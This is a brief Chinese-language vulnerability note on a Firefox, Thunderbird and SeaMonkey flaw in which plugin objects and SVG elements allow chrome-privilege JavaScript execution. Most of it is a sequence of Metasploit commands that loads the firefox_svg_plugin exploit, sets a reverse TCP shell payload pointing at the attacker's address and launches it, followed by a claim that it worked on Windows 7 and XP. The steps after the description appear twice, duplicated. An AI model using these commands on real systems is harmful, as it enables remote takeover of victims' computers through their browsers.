1、漏洞描述:
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allow remote attackers to execute arbitrary JavaScript code with chrome privileges by leveraging improper interaction between plugin objects and SVG elements.
2、样本生成:
http://www.metasploit.org/modules/exploit/multi/browser/firefox_svg_plugin
msf > use exploit/multi/browser/firefox_svg_plugin
msf exploit(firefox_svg_plugin) > show payloads
msf exploit(firefox_svg_plugin) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(firefox_svg_plugin) > set LHOST [MY IP ADDRESS]
msf exploit(firefox_svg_plugin) > exploit
3、测试环境
windows 7/xp均测试成功,此漏洞不用shellcode.
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allow remote attackers to execute arbitrary JavaScript code with chrome privileges by leveraging improper interaction between plugin objects and SVG elements.
2、样本生成:
http://www.metasploit.org/modules/exploit/multi/browser/firefox_svg_plugin
msf > use exploit/multi/browser/firefox_svg_plugin
msf exploit(firefox_svg_plugin) > show payloads
msf exploit(firefox_svg_plugin) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(firefox_svg_plugin) > set LHOST [MY IP ADDRESS]
msf exploit(firefox_svg_plugin) > exploit
3、测试环境
windows 7/xp均测试成功,此漏洞不用shellcode.